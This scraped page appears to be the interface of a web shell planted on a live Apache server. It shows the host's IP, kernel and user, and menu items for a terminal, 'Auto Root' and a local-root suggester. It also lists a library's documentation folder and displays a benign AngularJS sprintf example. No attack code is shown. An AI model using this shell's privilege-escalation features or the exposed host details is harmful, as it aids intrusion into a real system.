Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.217.80
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
libjs-sprintf-js /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
angular-sprintf.js
663
B
-rw-r--r--
2021-11-16 13:04
angular.html
617
B
-rw-r--r--
2021-11-16 13:04
sprintf.js
9.03
KB
-rw-r--r--
2021-11-16 13:04
Save
Rename
<!doctype html> <html ng-app="app"> <head> <script src="angular.min.js"></script> <script src="sprintf.js"></script> <script src="angular.sprintf.js"></script> </head> <body> <pre>{{ "%+010d"|sprintf:-123 }}</pre> <pre>{{ "%+010d"|vsprintf:[-123] }}</pre> <pre>{{ "%+010d"|fmt:-123 }}</pre> <pre>{{ "%+010d"|vfmt:[-123] }}</pre> <pre>{{ "I've got %2$d apples and %1$d oranges."|fmt:4:2 }}</pre> <pre>{{ "I've got %(apples)d apples and %(oranges)d oranges."|fmt:{apples: 2, oranges: 4} }}</pre> <script> angular.module('app', ['sprintf']) </script> </body> </html>